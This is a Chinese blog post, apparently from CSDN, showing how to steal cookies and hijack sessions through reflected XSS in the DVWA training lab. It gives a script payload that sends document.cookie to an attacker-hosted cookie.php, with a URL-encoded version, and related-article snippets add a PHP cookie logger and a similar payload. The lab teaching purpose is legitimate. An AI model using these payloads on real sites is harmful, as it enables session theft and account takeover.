dvwa中 利用反射型xss获取cookie进行会话的劫持演示

最新推荐文章于 2024-05-12 11:59:37 发布
最新推荐文章于 2024-05-12 11:59:37 发布
阅读量7.5k 收藏 22
点赞数 4
分类专栏: 学习笔记 文章标签: dvwa 反射型xss cookie获取 会话劫持
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35420342/article/details/79850177
版权

首先打开dvwa,设置安全等级为low:



输入<script>alert(11)</script>证明弹窗:


编写获取cookie的代码cookie.php,并将其放在一个web服务器上,这里我就放在http://127.0.0.1/dvwa/下面:


构造如下URL,并发送给被攻击者:

原始URL:
http://location/dvwa/vulnerabilities/xss_r/?name=
<script>doument.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>
需要进行URL编码:
http://localhost/dvwa/vulnerabilities/xss_r/?name=
%3Cscript%3Edocument.location%3D%27http%3A%2f%2f127.0.0.1%2fcookie.php%3Fcookie%3D%27%2bdocument.cookie%3B%3C%2fscript%3E#

受害者点击URL,会跳转到http://127.0.0.1/dvwa/cookie.php,并将cookie写入到了同目录下的cookie.txt中:



最后攻击者利用获取到的cookie登录到受害者的账户:







领悟。
关注
  • 4
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
php反射xss,利用反射XSS漏洞,模拟获取登录账户的Cookie
weixin_39819152的博客
04-01 698
目录结构一、测试环境二、测试目标三、原理描述四、操作步骤1.在服务器上搭建并启用hacker测试网站2.在服务器上测试站点根目录内创建一个存放攻击脚本的文件夹3.在xss文件夹下创建攻击脚本、cookie存储文件4.浏览器客户端向服务端提交特殊构造的XSS攻击脚本5.检查服务端获取到的cookie信息6.验证服务端获取到的cookie的有效性一、测试环境:PhpStudy+DVWA二、测试目标:从...
DVWA利用XSS获取Cookie
When you collect everything, you understand nothing.
09-06 3362
众所周知,利用XSS攻击,可以在用户登陆存在漏洞的站点之后,获取用户的Cookie值。有了Cookie,我们便可以在不知道用户名密码的情况下,模拟用户登陆站点。 本文记录一次在DVWA漏洞平台的XSS(Reflected)模块下,利用XSS获取该平台登陆Cookie的实验。 0x00实验准备 实验环境: DVWA:Windows 7,存在XSS网站;|IP: 192.168.124.6| 主机...
DVWA-XSS (Reflected)-反射XSS
最新发布
2401_84968222的博客
05-12 855
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
pikachu靶场之反射XSScookie盗取)
weixin_45705209的博客
08-20 1929
反射XSS 尝试payload发现存在字符长度现在,使用F12查看元素,把maxlength属性改为足够长。使用最简单的payload:<script>alert('xss')</script>,出现弹窗,说明存在漏洞。 利用漏洞获取cookie实例操作 这里我们用的例子是post,get利用容易被受害者察觉,因为get只能在url插入<script> document.location = 'http://127.0.0.1/pkxss/xcookie/coo
反射xss钓鱼盗取用户cookie
m0_53820621的博客
01-16 4414
演示用靶场:dvwa
DVWA反射XSS
追风筝的孩子
08-15 578
       这里对反射XSS的三个等级的代码进行分析,最高级的不讲。 一:LOW等级 1、服务器端核心代码 &lt;?php // Is there any input? if( array_key_exists( "name", $_GET ) &amp;&amp; $_GET[ 'name' ] != NULL ) { // Feedback for end u...
xss-dvwa靶场详情
04-06
dvwa靶场xss漏洞详情
dvwa靶场,里面也有xss靶场
09-24
我的连接数据库用户名是root,密码是123456,自己的不一样的话,在DVWA-master\config目录下config.inc.php文件内修改自己的密码。
DVWA下的XSS
07-25
DVWA下的XSS
PHP、Apache环境部署DVWA(综合靶场)
01-08
DVWA(Damn Vulnerable Web Application)是一款专门为安全研究人员和Web开发者设计的开源靶场工具,它包含了多种常见的Web应用漏洞,如密码爆破、SQL注入、文件上传、文件包含、跨站脚本(XSS)和跨站请求伪造...
58-58.渗透测试-DVWA靶场案例演示.mp4
05-10
58-58.渗透测试-DVWA靶场案例演示.mp4
XSS ———— (二)利用反射XSS窃取用户Cookie信息并利用
weixin_43102772的博客
02-27 1110
思路: 搭建能接收cookie的服务器 构建带有XSS恶意代码的url 发给用户诱导用户点击url 获得用户cookie利用 实验环境: kali————充当攻击者接收cookie的服务器 192.168.0.53 DVWA————充当客户要访问的目标网站 centos7————充当用户客户端 小试牛刀: 一、搭建服务器 1. kali开启Apache服务 systemctl start a...
跨站脚本攻击XSS 获取cookie (low)
weixin_44901204的博客
08-04 3625
XSS 跨站脚本攻击(Cross-site scripting),简称XSS(为区分CSS),它是一种迫使 Web 站点回显可执行代码的攻击技术。 XSS分为存储XSS(Stored XSS)和反射XSS(Reflected XSS) 存储XSS 思路: 黑客在服务器的某一个留言板上留言了一条可以执行的语句(这是一条命令),这条语句上有黑客的IP地址,普通用户去访问这个网站,一旦打开了留言板...
bWAPP利用反射xss获取cookie
****的博客
09-10 531
实验环境介绍 靶机:bWAPP bug类XSS - Reflected (GET) 难度级别:low 过程: 注:部分浏览器默认开启了XSS防御,关闭后才能实验成功。 测试靶机(图的web server)是否存在XSS攻击。 URL地址:“http://192.168.248.174/dvwa/bWAPP/xss_get.php” 输入js代码 <script>alert(1...
DVWA篇五:反射XSS
weixin_33897722的博客
11-12 115
1测试环境介绍 测试环境为OWASP环境DVWA模块 2测试说明 XSS又叫CSS (CrossSite Script),跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的,比如获取用户的cookie,导航到恶意...
基于dvwa反射xss获取cookie分享篇
weixin_47319512的博客
05-10 1339
好切回正题,这段代码的是正则表达意思就是把这些'/
XSS漏洞利用——获取cookie
cxrpty的博客
02-20 1728
实验环境:DVWA 实验步骤: 一、在服务器创建一个1.php文件获取cookie值,并将cookie值写入1.txt php代码如下: <?php $file=fopen("1.txt","a"); if($_GET['cookie']){ $cookie=$_GET['cookie']; fputs($file,"$cookie\r\n"); } ?> ...
DVWA——XSS(Reflected)——多种方法实现+详细步骤图解+获取cookie利用过程演示
热门推荐
weixin_46709219的博客
01-25 1万+
一)XSS(Reflected)介绍: 反射xss(非持久):需要欺骗用户自己去点击链接才能触发XSS代码(服务器没有这样的页面和内容),一般容易出现在搜索页面。特点:弹窗警告、广告;javascript;在浏览器执行。 通过Web站点漏洞,向客户交付恶意脚本代码,实现对客户端的攻击;恶意攻击者往Web页面里插入恶意的 Script 代码,当用户浏览该页面时,嵌入其 Web 里面的 Script 代码就会被执行,从而达到恶意攻击用户的目的;注入客户端脚本代码、盗取cookie、重定向等。 二)实际
基于DVWA实现XSS跨站脚本漏洞-反射、存储、DOM XSS
weixin_44029504的博客
05-08 1147
什么是XSS跨站脚本漏洞 XSS跨站脚本(Cross-Site Scripting,XSSXSS最大的特点就是能注入恶意的HTML/JavaScript代码到用户浏览的网页上,是因WEB应用程序对用户输入过滤不足而产生的,当用户浏览这些网页时,就会执行其的恶意代码。由于HTML代码和客户端JavaScript脚本能在受害者主机上的浏览器任意执行,这样等同于完全控制了WEB客户端的逻辑,在这个...
dvwa xss反射
08-29
对于DVWA(Damn Vulnerable Web Application)的XSS反射攻击,它是一种常见的Web应用程序安全漏洞。在XSS(跨站脚本攻击)反射攻击,恶意用户通过构造特定的URL参数或表单输入,注入恶意脚本代码到应用程序的响应,然后通过诱使受害者点击恶意链接或访问恶意网页来触发这些恶意脚本,从而窃取用户的敏感信息或执行其他恶意操作。 在DVWA,你可以使用XSS反射漏洞进行实验和学习,以了解攻击原理和防御措施。你可以通过创建一个包含恶意脚本代码的URL,然后将该URL发送给受害者或诱使受害者访问该URL,从而触发XSS反射漏洞。 注意,DVWA是一个有意设计成易受攻击的Web应用程序,目的是让开发人员和安全研究人员学习和实验各种Web应用程序安全漏洞。在实际应用程序,你需要采取适当的防御措施来防止XSS攻击,例如输入验证、输出编码和内容安全策略(CSP)等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值